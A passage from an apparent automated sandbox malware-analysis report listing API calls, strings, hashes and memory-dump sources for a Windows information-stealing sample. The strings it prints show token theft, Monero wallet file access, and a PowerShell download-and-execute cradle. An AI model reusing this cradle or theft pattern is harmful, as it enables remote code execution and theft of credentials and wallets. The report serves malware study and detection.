                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0013BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0013BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0013BDB9
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 73931084ddf6eb40afe09223271a6be499a6fb5700d77c5963d208433fbd1600
                  • Instruction ID: 79c97295d1cb93e254c5558e99fbba613f94379da11af006c00e692112dd7eac
                  • Opcode Fuzzy Hash: 73931084ddf6eb40afe09223271a6be499a6fb5700d77c5963d208433fbd1600
                  • Instruction Fuzzy Hash: 2FB16671950104ABEB14FBA0DC96EEE733CFF64305F814558F506A70A1EF346A49CB62
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 55815734e8f91df5bbe8cf51da097b4f829190d1e2fd28b4192d69e18fa751e9
                  • Instruction ID: c4beacd19761bd59e5db2820296990456b723f05e9cf09ebf85e1993366a7a52
                  • Opcode Fuzzy Hash: 55815734e8f91df5bbe8cf51da097b4f829190d1e2fd28b4192d69e18fa751e9
                  • Instruction Fuzzy Hash: A4F08231904249EFD3599FE0E90972C7B78FB45707F140198F61D86290D6744BC2DB97
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00134FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00134FD1
                  • InternetOpenA.WININET(00150DDF,00000000,00000000,00000000,00000000), ref: 00134FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00135011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00135041
                  • InternetCloseHandle.WININET(?), ref: 001350B9
                  • InternetCloseHandle.WININET(?), ref: 001350C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: f8c78b723a87982b71414394841b540ef6bc998242966d315b2ed2a9e92246e7
                  • Instruction ID: c8550823bd0e6ff2176ee3de7545b97ae70e0d8e0ff8f62080c86bbfc0123b8f
                  • Opcode Fuzzy Hash: f8c78b723a87982b71414394841b540ef6bc998242966d315b2ed2a9e92246e7
                  • Instruction Fuzzy Hash: B13116B4A40218EBDB24CF94DC85BDCB7B9EB48704F5081D8FA09A7280C7706EC58F99
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00148426
                  • wsprintfA.USER32 ref: 00148459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0014847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0014848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00148499
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0102DD88,00000000,000F003F,?,00000400), ref: 001484EC
                  • lstrlen.KERNEL32(?), ref: 00148501
                  • RegQueryValueExA.ADVAPI32(00000000,0102DC80,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00150B34), ref: 00148599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00148608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0014861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 02b23f9e992b3d9c760549fae5dbc2bd3da5e520700808ba43520ef2f1e35ce4
                  • Instruction ID: 7ef4c873f79e227427aca6b568ed189a70494faa1f7bcfabbaee0ba0b9d54a21
                  • Opcode Fuzzy Hash: 02b23f9e992b3d9c760549fae5dbc2bd3da5e520700808ba43520ef2f1e35ce4
                  • Instruction Fuzzy Hash: 3C2119B1940218ABDB64DB54DC85FE9B7B8FB88701F00C1D8E609A6190DF716AC6CFD5
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001476A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 001476AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0101BB60,00000000,00020119,00000000), ref: 001476DD
                  • RegQueryValueExA.ADVAPI32(00000000,0102DDA0,00000000,00000000,?,000000FF), ref: 001476FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00147708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 2624609dcc71c1ad718b5c04e9d5a3521c01a517ff5b3444d82d663e9e1aff4e
                  • Instruction ID: 05538406aa1870f23388c00eb59e191066b7f00a955c5b0b760663e9f4601815
                  • Opcode Fuzzy Hash: 2624609dcc71c1ad718b5c04e9d5a3521c01a517ff5b3444d82d663e9e1aff4e
                  • Instruction Fuzzy Hash: B0018FB4A04204BBE711DBE0DC4DF6DB7BCEB88702F004054FA08A72D1D77099408B52
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0014773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0101BB60,00000000,00020119,001476B9), ref: 0014775B
                  • RegQueryValueExA.ADVAPI32(001476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0014777A
                  • RegCloseKey.ADVAPI32(001476B9), ref: 00147784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 79d8a6d59b58cff7a8c705df157deeb83b3126eb9f5ddfafd2af7bdeb31b339c
                  • Instruction ID: e6799855b1d511b7347bd20f28d945189ba2ee7e65b7184a7dba7de1607b60b7
                  • Opcode Fuzzy Hash: 79d8a6d59b58cff7a8c705df157deeb83b3126eb9f5ddfafd2af7bdeb31b339c
                  • Instruction Fuzzy Hash: A90144B5A40308BBE711DBE4DC49FAEB7BCEB88705F004554FA09A7291D77055408B52
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                  • LocalFree.KERNEL32(0013148F), ref: 00139A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 5f707b6959b40490b07f2a7dea36bf69a565b29dfb5c51bc33a58a76edc1620e
                  • Instruction ID: dbfbe56d834c20ffb82fc57e1924060dccb1a30ac841b4aa3903ed611d83e3d0
                  • Opcode Fuzzy Hash: 5f707b6959b40490b07f2a7dea36bf69a565b29dfb5c51bc33a58a76edc1620e
                  • Instruction Fuzzy Hash: A1312DB4A00209EFDB24DF94D985BAE77B9FF48341F108258E915A7290D778A981CFA1
                  APIs
                  • lstrcat.KERNEL32(?,0102DF80), ref: 001447DB
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00144801
                  • lstrcat.KERNEL32(?,?), ref: 00144820
                  • lstrcat.KERNEL32(?,?), ref: 00144834
                  • lstrcat.KERNEL32(?,0101AED8), ref: 00144847
                  • lstrcat.KERNEL32(?,?), ref: 0014485B
                  • lstrcat.KERNEL32(?,0102D318), ref: 0014486F
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 00148D90: GetFileAttributesA.KERNEL32(00000000,?,00131B54,?,?,0015564C,?,?,00150E1F), ref: 00148D9F
                    • Part of subcall function 00144570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00144580
                    • Part of subcall function 00144570: RtlAllocateHeap.NTDLL(00000000), ref: 00144587
                    • Part of subcall function 00144570: wsprintfA.USER32 ref: 001445A6
                    • Part of subcall function 00144570: FindFirstFileA.KERNEL32(?,?), ref: 001445BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: bfe42bd206f77bf276c83a56f881a97f8b262a017f7078863db74258f4c7503b
                  • Instruction ID: c859e87e9977a5ca7744b53285ddf7b2ef7f4b8e6743fb23ef8370ae4f5cb1e7
                  • Opcode Fuzzy Hash: bfe42bd206f77bf276c83a56f881a97f8b262a017f7078863db74258f4c7503b
                  • Instruction Fuzzy Hash: 8D3172B2900218A7CB21FBB0DC85EED737CABA8704F404589B35996091EF7497C9CB96
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00142D85
                  Strings
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00142CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00142D04
                  • <, xrefs: 00142D39
                  • ')", xrefs: 00142CB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 8e620fc38ab498b6c6babe4bcb0f2d0917dbe65299030acc29ae73e4ae77617d
                  • Instruction ID: 18b240f3758529fa4d61049390e52162538bdb68fce786d6db6974be2eaac4e0
                  • Opcode Fuzzy Hash: 8e620fc38ab498b6c6babe4bcb0f2d0917dbe65299030acc29ae73e4ae77617d
                  • Instruction Fuzzy Hash: 6441DF71C902089AEB15FFA0C892BEDB774EF24305F914119F416AB1A2DF746A4ACF91
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00139F41
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                   • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 7eb90e9b89763d384a29b534993632f024e2f672e4a943c763799e1dce5e5b7e
                  • Instruction ID: 7038bf2bfc7427abaeacf13bc583d734c8a1148dbbfdd7456d2e4aa48f6c577b
                  • Opcode Fuzzy Hash: 7eb90e9b89763d384a29b534993632f024e2f672e4a943c763799e1dce5e5b7e
                  • Instruction Fuzzy Hash: E1617171A40208EFDB28EFA4CC96FED7775AF54301F418018F90A9F1A1EB746A06CB52
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,0102D398,00000000,00020119,?), ref: 001440F4
                  • RegQueryValueExA.ADVAPI32(?,0102DF38,00000000,00000000,00000000,000000FF), ref: 00144118
                  • RegCloseKey.ADVAPI32(?), ref: 00144122
                  • lstrcat.KERNEL32(?,00000000), ref: 00144147
                  • lstrcat.KERNEL32(?,0102DF50), ref: 0014415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 29e2d75b7fd9bf0da058010bf59d33df303e5c3aef530fe40bc2d0cb0058da50
                  • Instruction ID: a734ed2fd1ee1a097a9f475d120b8f46c851f932e21480fcf2a9de2c282f1892
                  • Opcode Fuzzy Hash: 29e2d75b7fd9bf0da058010bf59d33df303e5c3aef530fe40bc2d0cb0058da50
                  • Instruction Fuzzy Hash: 424197B6900108BBDB25FBA0DC46FEE737DAB98300F404558B61996191EB755BC88B92
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0101B7A8,00000000,00020119,?), ref: 00147E5E
                  • RegQueryValueExA.ADVAPI32(?,0102D338,00000000,00000000,000000FF,000000FF), ref: 00147E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00147E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: a256ca9c445b9d92c0f60aadcdce737f22ad2a5e07d905a09913ef7577de9ee9
                  • Instruction ID: f0e75943dcaf5653ea6c23b2695d7ad4add3c6cb8df22fd049d33716689e563f
                  • Opcode Fuzzy Hash: a256ca9c445b9d92c0f60aadcdce737f22ad2a5e07d905a09913ef7577de9ee9
                  • Instruction Fuzzy Hash: 4A118CB1A44605EBD725CFD4DD49FBFBBBCEB48B01F104259FA19A7290D77458008BA2
                  APIs
                  • StrStrA.SHLWAPI(0102DC50,?,?,?,0014140C,?,0102DC50,00000000), ref: 0014926C
                  • lstrcpyn.KERNEL32(0037AB88,0102DC50,0102DC50,?,0014140C,?,0102DC50), ref: 00149290
                  • lstrlen.KERNEL32(?,?,0014140C,?,0102DC50), ref: 001492A7
                  • wsprintfA.USER32 ref: 001492C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: ec9cf47b7f0e7f9b582fabc4dbcdfb0279ecf6b1f179e095f53319d5a06e1f6c
                  • Instruction ID: 1e967eae37967a52b8ee682f1af7dd57be55cc5b57ff69056a217dddaf57ba53
